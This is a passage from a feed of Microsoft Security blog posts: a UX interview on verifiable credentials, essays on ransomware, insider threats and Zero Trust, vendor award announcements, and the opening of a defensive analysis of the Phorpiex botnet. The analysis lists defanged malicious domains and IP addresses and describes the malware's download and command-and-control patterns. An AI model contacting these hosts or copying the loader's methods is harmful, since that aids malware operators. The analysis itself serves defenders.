Frank: True. I was a bit of a boomerang story. In college, I was studying cognitive science—a mixture of psychology and computer science. But I totally abandoned it because I fell in love with the theater. I moved across the country here to the Northwest and found myself in a theater company doing amateur acting and directing. And I really enjoyed it. I met some of the best friends of my life doing it, including my now wife.

Then as I got older, I decided it was time to do a career change. I still really loved technology. And as I found my way back to school at the University of Washington, poking around for what I could do, I discovered that user experience design actually marries a lot of my interests.

As an actor, the most exciting thing was to bring life to somebody by trying to understand what drives them to do the things they do. And that weird core instinct and competency you develop as an actor, I found, ended up being shockingly relevant when I wanted to get back into technology.

I said, “This is what I have to be doing.” That led me toward consulting for a while, and then eventually, in the last six years, here at Microsoft on the Identity and Network Access Team.

Alex: I don’t know how many people we have who joined from the theater, but I just think that’s super cool.

Frank: I know program managers who worked as stage managers.

Theater teaches you how to work really effectively with other people and as we know, working in tech is super collaborative. The theater teaches you how to be creative on a deadline. I really appreciate learning that. It helps me be more empathetic with my teammates to understand how we can all work together better and support each other.

Alex: You’ve been working on one of our most amazing, future-looking areas. Can you tell us what it is, what it does, and why it matters to the world?

Frank: For the last couple of years, we’ve been working on the problem of decentralized identity. We’re trying to bring things we take for granted in the real world into the digital world in a more authentic and transparent way. Because of COVID-19, we’ve had to do a lot less in-person. We’ve had new challenges of how to bring trust, verifiability, and accountability to the online space when it comes to proving things about yourself. You can think of examples like digital driver’s licenses or passports, ways to reduce fraud, or applying for loans.

Right now, we still fax and scan. I’ve got my COVID-19 vaccination record here, this attestation or proof that I’ve gone and done something. This paper card somehow makes this authentic. Try thinking about this in the digital world. We haven’t really had a good way to do it. We see people not being able to verify things about one another. We see privacy breaches. We see hacks. We know we have to get better at control and ownership of personal data.

A couple of changes in the last few years have allowed us to innovate in this space in a way that Microsoft is uniquely positioned to do. First, we have a rise of open standards. Everyone has mobile phones now that are biometrically secured, so we can store more sensitive data on them. And we have new technologies like Blockchain, which allows for decentralized verifiability so that I can prove something about you without having to go through some central authority. All this allows us to think about new ways of proving and verifying things about yourself and your identity online and sharing that with other parties.

At the heart of the challenge is how do we educate people? How do we give them the level of security, power, and control they desire, without making the experience way too simple or way too complicated?

It’s really on us as communicators and product designers to say, “How can we make it clear that we’re not storing this data in some central server, that this is yours and it travels with you? This bit of information is just stored locally on your phone, so you’ve got to back it up.” It can increase trust that people own their data, but it can also be scary because then they think, “What happens if my phone goes in the lake or gets stolen?”

We’re also thinking about how much friction to put in front of somebody to evoke a moment of realization. We accept terms and conditions and cookies all the time because we want to get to the things that are important and valuable to us. A lot of times, we don’t even think about what we’re giving away. We want to restore people’s power to make that decision, but we also don’t want to give them button fatigue, where they’re always just clicking yes, accept, accept, accept because they don’t want to deal with all of these boxes in their way.

Graphic of presentation and verification UX design stages on an iPhone screen.

Figure 1: Permission and verification UX design.

Alex: I’ve really enjoyed watching how many different iterations of the design you’ve gone through. Can you tell us more about that iterative design approach?

Frank: As the designer, I always start with, “What are we trying to communicate here? What are the words? What’s the data? How will it be used and shared?”

You’re trying to marry content and users with an effective design. When you design something, you think will be used everywhere, it’s hard to drill down to specific use cases and get crisp about requirements. So, the early days were driven by our initial pilot customers.

We started by imagining how our early adopters would use the product and the kind of data they could store and share. For us, it was really about paring back. “What does it look like to have a credential and share that credential? What do I need to see about the credential? When do I need to see it? And how can we make that as simple as possible so we can learn?”

Because really, we’re going to learn so much more from putting this in front of people than by trying to refine the design over and over. “What’s the simple product that is clean and crisp, that will allow us to get the most data, and allow those use cases and requirements to evolve? How can we make something that’s elegant and familiar?”

We said, “Okay, it’s going to have to be cards in the wallet because that’s what people will recognize.” The driver’s license example comes to mind. A lot of people think in those terms, and so that really helped drive us towards that iteration. But I can show you some designs where we had QR codes on the front. We had lots of different data. We were making these things very, very elaborate. And I’d love to get there someday. We’re going to let the use cases drive that as time goes on.

Alex: I love the work you’ve done to show people receipts for all the places they use their credentials. I feel like it’s one of those little “aha” kind of things that almost brings some sense of joy or exceeds expectations.

Frank: One of the great features of these credentials is that you can understand where you’ve been using them. If I ever want to share my credential, I have a history.

Now once I give it to somebody, there’s nothing I can do about the fact that they have it. I can tell them later, “I don’t want you to use this anymore,” but once they’ve made a copy of it, it’s theirs. At the very least, we have this concept of, “Here’s the date, here’s the reason I gave it to you, and here’s the reason you asked for it.”

A lot of the current single sign-on experiences involve signing in with a third-party identity provider. I’m granting blanket permission here. You can use my email address and have access to my contacts and email. And there’s no expiration date on any of that. There’s no understanding of what they grabbed and when. For us, it was very important to create visibility for users to understand, “This is what I shared, why, and when.”

Alex: Your team has come up with such a simple, understandable user experience, but also one that’s even better in some ways than the physical world, because I get that running record of all the places that I’ve used a credential and what I do with it.

Frank: Right. It’s what we’d expect out of something digital. That’s what makes it better.

Alex: So Frank, if someone reading this blog wants to get into the profession and think about UX design the way you do, any advice on how to get started?

Frank: I’m a bit envious of the college undergraduates today. They have actual programs that didn’t exist when I was in school. But still, one of the great things about UX design is people come to it from all different backgrounds: computer science, theater, journalism, graphic design. The most important thing is curiosity and empathy. It really is about understanding what motivates people and being a voice in the room for the end-user. And I know we’re all preaching that it’s everybody’s responsibility, but we can always make sure we put in that extra effort to bring clarity and a desire to see the way things could be, not just the way they are today.

Alex: Well, Frank, I appreciate your taking the time today and the wonderful work you’ve been doing. And I’m looking forward to all the new things that we’re going to learn while Azure Active Directory (Azure AD) verifiable credentials is in preview.

Learn more

Learn more about verifiable credentials.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How user experience is shaping verifiable credentials and identity appeared first on Microsoft Security.

Becoming resilient by understanding cybersecurity risks: Part 4—navigating current threats

May 26th, 2021 No comments

In part three of this blog series on aligning security with business objectives and risk, we explored what it takes for security leaders to shift from looking at their mission as purely defending against technical attacks, to one that focuses on protecting valuable business assets, data, and applications.

As businesses begin reimagining their future in a post-pandemic world, most are pivoting to a digital-first approach to take full advantage of technological innovation (much of which was adopted in haste). The pandemic has accelerated three existing trends and the tension between them: how to remain relevant against a backdrop of consumer and market demands, how to react and respond to evolving cyber threats, and how to do this reliably while reducing complexity and cost.

Becoming a resilient organization requires collaboration between business and security leaders and a lifecycle approach to continuous improvement.

Visual chart depicting the four stages of the life cycle of an incident: Before, during, and after an incident and the lessons learned.

Figure 1. The cyclical stages of an incident.

In this blog, we delve deeper into specific themes in recent cyberattack trends—how and why they work so effectively—and strategies to mitigate them.

On-premises vs. cloud security

As we’ve seen from the progression of headline-grabbing attacks over the course of this blog series, today’s attackers have choices. They can remain on-premises and have a better chance of lingering unseen in the complexity of multiple generations of legacy technology, or they can elevate privileges and move to the cloud, where there’s a higher risk of detection. In the most recent nation-state attack, HAFNIUM took the path of least resistance and targeted organizations through on-premises Microsoft Exchange Servers, leveraging a zero-day exploit to gain backdoor access to data centers. After Microsoft released critical out-of-band updates, attackers were quick to seek out and compromise unpatched servers in a race to take advantage of the situation before those doors were closed.

The Exchange attack illustrates challenges faced by companies in managing a complex hybrid of on-premises and cloud that spans many generations of technology. For many organizations, it can be a costly operation to upgrade systems; so, security teams are often asked to protect both old and new technology at the same time. Organizations need to simplify the management of this complex mix because attackers are always looking for vulnerabilities. The good news is that cloud security is no longer just for cloud resources; it’s extending to cover on-premises resources, up to and including the 50 to 100-year-old operational technology (OT) equipment that’s controlled by computer technology retrofitted 30 to 50 years ago.

Your security team can reduce risk by prioritizing the cloud as the preferred source of security technology. This will simplify adoption, reduce maintenance overhead, ensure the latest innovations and capabilities, and provide unified visibility and control across multiple generations of technology. No longer are we just referring to cloud security, but rather security delivered from the cloud.


Criminal organizations are increasingly relying on cybercrime as a high-reward, low-risk (illicit) line of business. However, it’s the evolution of human-operated ransomware that’s now driving the business need to address longstanding security hygiene and maintenance issues. Ransomware’s evolution can be traced to WannaCry and NotPetya malware, which fused large-scale compromise techniques with an encryption payload that demanded ransom payments in exchange for a decryption key. Sometime around June 2019, the new generation of human-operated ransomware started infecting systems, expanding into an enterprise-scale operation that blends targeted attacks and extortion.

What makes human-operated ransomware so dangerous? Unlike most cyber threats, these are not preprogrammed attacks. Human attackers know the weaknesses in your networks and how to exploit them. Attacks are multistage and opportunistic—they might gain access via remote desktop protocol (RDP) brute force or through banking trojans, then decide which networks are most profitable. Like nation-state attacks, these breaches can have dwell times lasting from minutes to months. Human operators may also deliver other malicious payloads, steal credentials, or exfiltrate data. Some known human-operated ransomware campaigns that Microsoft actively monitors include REvil, Samas, Bitpaymer, and Ryuk.

Attack paths of human-operated ransomware.

Figure 2: Human-operated ransomware—attack paths.

Human-operated ransomware is an extortion model that can use any one of multiple attack vectors. These attacks are often highly damaging and disruptive to an organization because of the combination of:

  1. Broad access to business-critical assets: Attackers rapidly gain broad enterprise access and control through credential theft.
  2. Disrupt business operations: The extortion business model requires inflicting the maximum pain on the organization (while still allowing recovery) in order to make paying the ransom attractive.

By denying access to business-critical data and systems across the enterprise, the attackers are more likely to profit, and organizations are more likely to suffer significant or material impact.

In the same way COVID-19 has shifted industry perceptions regarding bring-your-own-device (BYOD) policies and remote work, human-operated ransomware is poised to trigger seismic shifts in cybersecurity. Organizations who fail to prepare for these evolving threats face the prospect of performing mass restores of systems and data or paying the ransom (not recommended).

This is particularly true if they have any of these commonly held (and dangerous) false beliefs:

  • Attackers aren’t interested in us because we’re just: a small organization, don’t have secrets, not a government, or other seemingly relevant characteristics.
  • We are safe because we have firewalls.
  • A password is good enough for admins; so multifactor authentication (MFA) can be deferred.
  • Attackers won’t find unpatched VPNs and operating systems; so, maintenance can be deferred.
  • We don’t apply security updates to internal systems like domain controllers to avoid impacting availability and performance.
  • Security operations (SecOps) can manually write every alert and respond using a SIEM and a firewall; so, modernization with high-quality XDR detections and SOAR can be deferred.

If your organization is targeted, we strongly discourage paying any ransom, since this will incentivize future attacks. Also, there’s no guarantee that payment will get you the promised decryption key, or even that the attackers won’t sell your data on the dark web anyway. For a specific plan of how to address ransomware, see our downloadable Ransomware recommendations PowerPoint.

On the upside, having a business continuity and disaster recovery (BCDR) solution can provide a crucial safety net. Datto’s Global Ransomware Report 2020 indicates that three-out-of-four managed service providers (MSPs) report that clients with BCDR solutions recovered from a ransomware attack within 24 hours. However, just having a BCDR plan is not enough; you need an immutable backup that cannot be corrupted or deleted as attackers try to corrupt these backups.

This control needs to be implemented effectively across all generations of technology, including on-premises and in the cloud. Information protection and file encryption can also make data unreadable, even if exfiltrated.

Insider threats

Many data leaks can be attributed to accidents by insiders, but the risk posed by deliberate internal threats is on the rise as well—68 percent of organizations feel “moderately to extremely vulnerable” to all kinds of insider attacks. The same percentage confirms that insider attacks are becoming more frequent. Anyone who has access to an organization’s confidential data, IT, or network resources is a potential risk, whether they intend to do harm or not. This could include employees, consultants, vendors, former employees, business partners, or even a board member.

Recent examples include a former Amazon finance manager charged in a $1.4 million insider trading scheme, a Shopify data breach carried out by two employees, and an insider attack at Stradis Healthcare carried out by the former vice president of finance that “disrupted the delivery of personal protective equipment in the middle of a global pandemic.” Deliberate insider threats straddle both the physical and digital workspace, but organizations can protect themselves by looking for signs, including:

Digital warning signs

  • Accessing data not associated with their job function.
  • Using unauthorized storage devices.
  • Network crawling and searches for sensitive data.
  • Data hoarding or copying sensitive files.
  • Emailing sensitive data outside the organization.

Behavioral warning signs

  • Attempts to bypass security.
  • Frequently in the office during off-hours.
  • Displays disgruntled behavior.
  • Violates corporate policies.
  • Discusses resigning or new opportunities.

The key to preventing insider threats is to detect a violation before it happens. This means being empathetic to your organization’s changing environment and managing potential stressors that could lead to aberrant behavior. Being cognizant of employee wellbeing is not only in the best interests of your staff, it also drastically reduces the occurrence of insider threats for your organization. Microsoft invests in mitigating both accidental and deliberate insider threats with insider risk management, policy tips, and more.

Overcoming analyst fatigue

As the dust settles after the double-impact of the Nobelium and Hafnium attacks, we’re returning to a “normal baseline” of steadily increasing impact, volume, and sophistication of attacks. This lack of relief hits security professionals hardest, particularly analysts in security operations responding to these incidents.

The talented security professionals who silently bear the burden of attackers’ profit models often experience a high likelihood of burnout. According to PsyberResilience, the list of reasons for burnout among security professionals is long: fear of letting the organization down by missing that one threat amongst thousands every day; exhausting work schedules; fatigue from trying to keep up with new threats and technologies; the emotional toll of facing down criminals and witnessing their lack of morality.

Security teams need real help, and they need to feel supported and connected to the mission. Here are a few tips that can go a long way:

  • Show your appreciation: The first minimum step for business leaders is to thank these hardworking people and get a basic understanding of what it’s like to experience these attacks from the ground level. Just as CEOs and business leaders should take time out to meet the people who make business operations work (like factory workers, truck drivers, nurses, doctors, cooks, engineers, and scientists), they should also do the same with security operations personnel to show the importance of the work to keep the organization safe every day.
  • Enable automation and orchestration: This is critical to removing redundant, repetitive workflows or steps that burn up work hours and burn out employees. Azure Sentinel and Microsoft 365 Defender automate investigation and remediation tasks for many incidents, reducing the burden of repetitive work on analysts. Different security solutions in your enterprise need to see and share threat intelligence, driving a unified response across on-premises and multi-cloud environments.
  • Bring in help: Many companies find it difficult to recruit and retain security professionals, especially organizations that have a smaller security team. Supplementing your team with experts from service providers can help you bring in top talent for the limited times you need them or help scale the experts you have by shifting high-volume frontline analyst work to the service provider.
  • Take a collaborative approach: Reach out to peers in other industries to learn about their challenges. How do hospitals secure their patient data? How is cybersecurity done in retail operations, airlines, or government offices? Looking into different verticals might offer some new ideas and inspiration. An army of interconnected defenders provides more clarity and oversight than any single organization can maintain. For more technical information about how this works, learn about the community-based approach to information security.

Augmented intelligence and deepfakes

Using machine learning and automation has proven to be an incredible tool for defenders to detect and respond to threats faster. However, attackers also have access to similar technology and are leveraging this to their advantage. In another example of the cyber and physical worlds coming together, cybercriminals were able to create a near-perfect impersonation of a chief executive’s voice using deepfake technology—tricking the company into transferring $243,000 to their bank account. Attackers combined machine learning and AI with social engineering to convince people to move the money.

While still rare, AI and machine learning attacks like this are becoming more common. Attackers can make deepfake using public recordings of their target from earnings calls, interviews, and speeches, mimicking their mannerisms and using the technology as a kind of mask. Despite the advanced technology required for one of these attacks, the defense may be refreshingly straightforward and non-technical—if in doubt, call the person back. Using a secondary authentication for high-value transactions can also provide an additional secure step in the approval process, making it difficult for attackers to anticipate and fake out all of the channels at once.

With the use of AI and machine learning becoming more prolific in the defender’s kit bag, cybercriminals have also taken to attacking and poisoning the algorithms that are used to detect anomalies; often flooding the algorithm with data to skew results or generate false positives. In short, the human intelligence layer remains critical to providing contextual awareness and understanding of new cyber threats, helping to decipher the evolving tactics and techniques designed to evade detection.

Stay tuned

The next post in this series will focus on how your organization can pull all these concepts together into a security strategy that integrates with your business priorities, risk frameworks, and processes.

If you want to read ahead, you can check out the secure methodology in the cloud adoption framework.

Learn more

Read the previous blogs in this series:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Becoming resilient by understanding cybersecurity risks: Part 4—navigating current threats appeared first on Microsoft Security.

Categories: CISO, cybersecurity Tags:

Microsoft is a Leader in the 2021 Forrester Endpoint Security Software as a Service Wave

May 25th, 2021 No comments

We are excited to share that Microsoft has been named a Leader in The Forrester Wave™: Endpoint Security Software as a Service, Q2 20211, receiving one of the highest scores in the strategy category and among the top three scores in the current offering category. Forrester notes that “the focus on endpoint security has increased as cyber risks shift from the network to the endpoints, prompted by increasing amounts of homeworkers and the bulk movement of data from enterprise network-connected data centers to edge devices.”

Microsoft Defender for Endpoint received the highest possible scores in the control, data security, and mobile security criteria, as well as in the Zero Trust framework alignment and security community involvement criteria. Forrester also noted our “impact on endpoint is also notably low when actively running on the endpoint, and that the number of reported false positives by customers is also the lowest in this evaluation.”

As Vasu Jakkal, Corporate Vice President of Marketing for Security, Compliance, and Identity, states in her blog, we are operating in the most complex cybersecurity landscape we’ve ever seen and security has never been more important. It’s clearer than ever that a Zero Trust approach is critical to success. Our continued investments in extending Microsoft Defender for Endpoint’s industry-leading capabilities across non-Windows platforms, such as macOS, Linux, Android, and iOS, help customers get visibility into all endpoints accessing corporate data and apply the right controls necessary to minimize their growing attack surface. Our strengths in threat detection and integrated XDR approach across endpoints, email and collaboration, identities, and cloud apps further enable security teams’ ability to enable a true Zero Trust strategy.

Also critical to all of our success is the need to share and contribute to the security community so that all can be equipped to strengthen defenses and respond to attacks such as what we’ve seen with web shell attacks, NOBELIUM (Solorigate), and HAFNIUM. As we have seen in recent months, with attacks becoming more coordinated and sophisticated, community collaboration and sharing can help us all take the steps needed for a safer world.

The Forrester WaveTM: Endpoint Security as a Service, Q2 2021 graphic showing Microsoft in the Leaders space.

Our continued leadership in security is due in part to the close partnership we have with customers who give us continuous feedback in the product development process. We are grateful for their continued trust in us and are committed to delivering innovative security capabilities that help them secure their organizations.

Microsoft Defender for Endpoint is seamlessly built into Microsoft 365 Defender, our solution offering XDR capabilities for identities, endpoints, cloud apps, email, and documents. Microsoft 365 Defender delivers intelligent, automated, and integrated security in a unified security operations (SecOps) experience, with detailed threat analytics and insights, unified threat hunting, and rapid detection and automation across domains—detecting and stopping attacks anywhere in the kill chain and eliminating persistent threats.

Our mission is to empower defenders with the best security capabilities in the industry so that you can focus on what’s important: preventing and remediating threats.

You can download The Forrester Wave™: Endpoint Security Software as a Service, Q2 2021 complimentary report to get more details about our position as a Leader. We thank our customers and partners for being on this journey with us.

Learn more

Microsoft Defender for Endpoint is an industry-leading, cloud-powered endpoint security solution offering vulnerability management, endpoint protection, endpoint detection and response, and mobile threat defense. With our solution, threats are no match. If you are not yet taking advantage of Microsoft’s unrivaled threat optics and proven capabilities, sign up for a free trial of Microsoft Defender for Endpoint today.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


¹The Forrester Wave™: Endpoint Security Software as a Service, Q2 2021, Chris Sherman, May 13, 2021.

This graphic was published by Forrester Research as part of a larger research document and should be evaluated in the context of the entire document. The Forrester document is available upon request here.

The post Microsoft is a Leader in the 2021 Forrester Endpoint Security Software as a Service Wave appeared first on Microsoft Security.

Categories: cybersecurity Tags:

Resources for accelerating your Zero Trust journey

May 24th, 2021 No comments

For many organizations, 2020 was the year that finally saw remote work become a reality on a global scale. As many people begin transitioning back to the office, many organizations are thinking about how they can transition from a remote workforce to a more permanent hybrid workplace. We recently conducted a study with over 900 chief information security officers (CISOs) on the state of Zero Trust and found that 81 percent say their organization has started or currently has a hybrid work environment in place and that 91 percent plan for their organization to be fully transitioned to hybrid work within the next five years. The era of hybrid work is here to stay. Learn more about our perspective and security efforts in Vasu Jakkal’s blog, Securing a new world of hybrid work: What to know and what to do, posted earlier this month.

However, as recent events have shown us, the cybersecurity landscape continues to evolve. Bad actors are getting more sophisticated and the need for a stronger security model has never been more important. Zero Trust is no longer an option, it’s now imperative for organizations that want to protect themselves while providing employees the flexibility they need to be productive.

Accelerating your hybrid work readiness with Zero Trust

Implementing a Zero Trust model means transitioning from implicit trust—where everything inside a corporate network is assumed to be safe—to a model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signal and data. A contextual, real-time policy helps enforce least-privileged access principles and minimize risks. Zero Trust not only strengthens security but also enables the transformation needed to embrace hybrid work.

Screenshot of Microsoft's Zero Trust Maturity model whitepaper

I often hear from customers that implementing a Zero Trust security framework can be daunting and that they’re looking for help in creating a roadmap with the right prioritized milestones to maximize investments and positively impact their users. In this post, I’d like to provide an overview of the resources available to help accelerate your Zero Trust readiness and provide actionable guidance.

If you haven’t already, I suggest starting with our Zero Trust Maturity Model whitepaper, which breaks down Zero Trust requirements across identities, endpoints, apps, networks, infrastructure, and data. This paper provides a strong starting point to assess your current Zero Trust maturity, prioritize security efforts to maximize impact, and get a foundational understanding of overall capabilities and requirements.

My colleague, Mark Simos, also posted a blog, Zero Trust Strategy—what good looks like, based on his experience helping customers transform their security strategies that expands on many of the concepts in the maturity model.

Assess your Zero Trust maturity and plan the next steps in your journey with the updated assessment tool

We created the Microsoft Zero Trust Assessment tool to help you determine where you are in your Zero Trust implementation journey and provide to-dos and deployment guidance to help reach key milestones. This month, we released an updated version that provides more targeted guidance and a curated list of resources to help you better prioritize milestones based on your current progress. Now, when a gap is identified in your Zero Trust readiness, you’ll see which specific capabilities you need, the Microsoft products and services that can provide those and step-by-step guidance on implementation.

The Zero Trust Assessment tool gives you specific instructions for next steps in your Zero Trust adoption.

Get specific suggestions for next steps in your Zero Trust adoption with the assessment tool.

Get up to speed on the essentials of Zero Trust

This month, we’re kicking off our new Microsoft Mechanics video series focused on Zero Trust. In this series, Jeremy Chapman, Director of Microsoft 365, provides a breakdown of how you can adopt a Zero Trust approach across the six layers of defense—identities, endpoints, apps, networks, infrastructure, and data. This series will share tips and provide hands-on demonstrations of the tools for implementing the Zero Trust security model.

Our first two videos are out now:

Screen grab of YouTube video series, Microsoft Mechanics, featuring Microsoft 365 Director, Jeremy Chapman.

Watch our new video series, starting with Microsoft Mechanics Zero Trust Essentials.

Other resources

Here are some of the other resources we’ve put together as a result of our efforts helping customers, managing our own Zero Trust deployment, and listening to all of you:

  • For an in-depth look at our latest updates that will help accelerate your Zero Trust journey, check out Vasu Jakkal’s blog, How to secure your hybrid work world with a Zero Trust approach, from earlier this month.
  • For technical guidance, visit our Zero Trust Resource Center—A repository of information that provides specific guidance on implementing Zero Trust principles across their identities, endpoints, data, applications, networks, and infrastructure.
  • If you’d like to learn from our own Zero Trust deployment journey at Microsoft, our CISO Bret Arsenault and team share their stories at Microsoft Digital Inside Track.
  • To hear from leaders who sponsored, guided, and oversaw the adoption of Zero Trust within organizations, check out the Zero Trust Business Plan.
  • Learn how to get buy-in for Zero Trust in a recent webcast with Microsoft Corporate Vice President, Microsoft Identity, Alex Simons.
  • If you’re into podcasts, please check out Episode 3 of the Strengthen and Streamline Your Security podcast to hear discussion on the steps leading organizations are taking and get recommendations to reduce your risk and enable employee productivity.
  • Lastly, Examining Zero Trust is an executive roundtable discussion with 10 security leaders sharing their own experiences and real-life examples of adopting the fundamentals of Zero Trust.

Learn more

For more information about Microsoft Zero Trust, please visit our website and keep up-to-date with product announcements, technical guidance, planning resources, and more in our Zero Trust blogs.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Resources for accelerating your Zero Trust journey appeared first on Microsoft Security.

Categories: cybersecurity, Zero Trust Tags:

Microsoft recognized as a Leader in The Forrester Wave™: Unstructured Data Security Platforms, Q2 2021

May 24th, 2021 No comments

In this new world of hybrid work, organizations face an increasing volume of data, ever-evolving regulations around how that data is protected, and an evolving complexity and frequency of data security breaches. To help our customers navigate this complex data landscape, we are focused on delivering secure, intelligent, and user-centric solutions that provide visibility, reduce complexity, and mitigate risk.

Over the past few years, we significantly increased our investment in building risk management and compliance solutions, inclusive of information protection and data loss prevention (DLP). We delivered new solutions, such as Microsoft Information ProtectionEndpoint DLP, and product features, including trainable classifiers, the “know your data” dashboard, and enhanced sensitive information types, to name a few. Additionally, we invested in extending the Microsoft Information Protection ecosystem with continued innovation via our SDK. Over 200 partners now extend our protection capabilities to various customer use cases.

In recognition of these investments, I am delighted to announce that Forrester listed Microsoft as a Leader in its 2021 Wave for Unstructured Data Security Platforms, receiving the highest score in the strategy category. The Forrester Wave report evaluates the data security platform market and provides a detailed overview of the current offering, strategy, and market presence of these vendors. Microsoft received the highest possible score in inspection, security and risk, APIs and integrations, data security platform vision, data security execution roadmap, market approach, performance, planned enhancements, Zero Trust enabling partner ecosystem, and diversity, equity, and inclusion criteria.

Forrester Wave chart demonstrating the ratings of vendors in the 2021 Wave for Unstructured Data Security Platforms.

For us, this recognition reinforces our leadership in innovative data security and compliance solutions. We continue to work closely with our customers to gather feedback to help us build better products. Your input provides critical insights as we strive to create solutions to help you on your journey in managing information, compliance, and risk.

Learn more

Read more about Microsoft’s recognition as a leader in cloud security, email security, security analytics, and more in these blogs:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft recognized as a Leader in The Forrester Wave™: Unstructured Data Security Platforms, Q2 2021 appeared first on Microsoft Security.

Categories: cybersecurity Tags:

Phorpiex morphs: How a longstanding botnet persists and thrives in the current threat environment

May 20th, 2021 No comments

Phorpiex, an enduring botnet known for extortion campaigns and for using old-fashioned worms that spread via removable USB drives and instant messaging apps, began diversifying its infrastructure in recent years to become more resilient and to deliver more dangerous payloads. Today, the Phorphiex botnet continues to maintain a large network of bots and generates wide-ranging malicious activities.

These activities, which traditionally included extortion and spamming activities, have expanded to include cryptocurrency mining. From 2018, we also observed an increase in data exfiltration activities and ransomware delivery, with the bot installer observed to be distributing Avaddon, Knot, BitRansomware (DSoftCrypt/ReadMe), Nemty, GandCrab, and Pony ransomware, among other malware.

The botnet’s geographic targeting for bot distribution and installation expanded, too. Previous campaigns focused on targets in Japan, but more recent activity showed a shift to a more global distribution.

World map showing global distribution of Phorpiex botnet ativity

Figure 1. Global distribution of Phorpiex botnet activity

The Phorpiex botnet has a reputation for being simplistic and lacking robustness, and it has been hijacked by security researchers in the past. Its tactics, techniques, and procedures (TTPs) have remained largely static, with common commands, filenames, and execution patterns nearly unchanged from early 2020 to 2021. To support its expansion, however, Phorpiex has shifted some of its previous command-and-control (C2) architecture away from its traditional hosting, favoring domain generation algorithm (DGA) domains over branded and static domains.

This evolution characterizes the role of botnets in the threat landscape and the motivation of attackers to persist and remain effective. The threat ecosystem relies on older botnets with large and diverse network of compromised machines to deliver payloads at low costs. And while many of the older botnet architectures have been primarily classified as spam delivery mechanisms, these infrastructures are critical for newer, modular delivery mechanisms.

Phorpiex also demonstrates that bots, which are some of oldest types of threats, continue to affect consumer users but notably brings increasingly more serious threats to enterprise networks. Despite being traditionally associated with lower-risk activity like extortion and spamming, Phorpiex operators’ decision to move to more impactful malware and actions is entirely at the whim of the attackers.

Understanding botnets and associated infrastructure, botnet malware, their activities and payloads, and how they evolve provides insight into attacker motivation and helps ensure durable protection against some of the most prevalent threats today. At Microsoft, we continue to conduct in-depth research into these threats. These expert investigations add to the massive threat intelligence that inform Microsoft 365 Defender services and the protections they provide. Microsoft 365 Defender delivers coordinated cross-domain defense against the various malware, emails, network connections, and malicious activity associated with Phorpiex and other botnets.

Distribution, expansion, and operation

Phorpiex’s sprawling botnet operation can be divided into three main portions:

  1. Distribution of the bot loader: The bot loader has been propagated through a variety of means over the years, including being loaded by other malware, freeware, and unwanted programs, or delivered by phishing emails from already-infected bots. Phorpiex has also spread via productivity platforms, as well as via instant messaging and USB drives.
  2. Mailing botnet: In addition to spreading the bot loader via email, the botnet is used to generate currency. It does so via extortion and spam campaigns as well as through a variety of other types of financially motivated malware.
  3. Malware delivery botnet: In recent years, the botnet has been observed installing ransomware, cryptocurrency miner, and other malware types, indicating the expansion of the botnet’s activities by the Phorpiex operators or as part of malware-as-a-service scheme.

From December 2020 to February 2021, the Phorpiex bot loader was encountered in 160 countries, with Mexico, Kazakhstan, and Uzbekistan registering the most encounters.

Column chart showing top 10 countries with most Phorpiex encounters

Figure 2. Countries with the most encounters of the Phorpiex bot loader

In December 2020 and January 2021, we observed non-weaponized staging of Knot ransomware on Phorpiex servers. In February, we also detected commodity malware such as Mondfoxia (also known as DiamondFox) in these servers. These recent developments indicate new loader and monetization strategies under active development.

The combination of the wide variety of infection vectors and outcomes makes the Phorpiex botnet appear chaotic at first glance. However, for many years Phorpiex has maintained a consistent internal infrastructure using similar domains, command-and-control (C2) mechanisms, and source code.

The wide range of infection vectors used by Phorpiex requires a unified security approach that ensures protection is delivered on the endpoint, network, email, and applications. Microsoft 365 Defender’s advanced threat protection technologies detect malicious activity in each of these domains. Moreover, the correlation of these cross-domain threat data surfaces additional malicious activity, allowing Microsoft 365 Defender to provide coordinated and comprehensive protection against Phorpiex.

Bot distribution and installation

Phorpiex maintains and expands its network of bot-infected computers by distributing the Phorpiex bot loader. In 2020 and 2021 we observed the bot loader being spread through Phorpiex bot-delivered emails with .zip or other archive file attachments, downloaded from fake download sites for software (such as photo editing software, screensaver, or media players), or downloaded by other malware also delivered through email. These multiple entry points demonstrate the modular nature of the malware economy.

Regardless of distribution mechanism, however, the bot loader operates in a fairly uniform fashion. It uses three distinct types of C2 to fulfil different goals during and after installation:

  • Downloading the Phorpiex malware implant
  • Downloading updates to the Phorpiex implant and new exploit modules
  • Checking in with C2 infrastructure to deliver cryptocurrency or return data

The malware implant is initially downloaded from sites such as trik[.]ws (historically) or, more recently, a malware hosting repository, worm[.]ws. We are also noticing a shift to using more dedicated IP-based C2 and delivery sites, such as 185[.]215[.]113[.]10 and 185[.]215[.]113[.]8. A notable Phorpiex behavior is the downloading of numbered modules, typically numbered 1-10, with URL paths such as <domain>.com/1, <domain>.com/2, <domain>.com/3, continuing this pattern for as many additional components as needed. As these downloads do not happen through standard web traffic, network-level protection is necessary to prevent malicious downloads. In a very recent development, we observed that most Phorpiex bot loader malware have  abandoned branded C2 domains and have completely moved to using IPs or DGA domains. However, as in the past, the operators neglected to register all the potential sites that the DGA domains resolve to.

When downloaded and run, the implant attempts to connect to legitimate external sites like to get IP information. It does this repeatedly during subsequent check-ins, and then begins connecting to hardcoded C2 servers. During these check-ins, the implant checks the device’s regional settings and exits if it’s operating in a non-desired region, such as Ukraine. Favored regions include countries in East Asia as well as English-speaking countries.

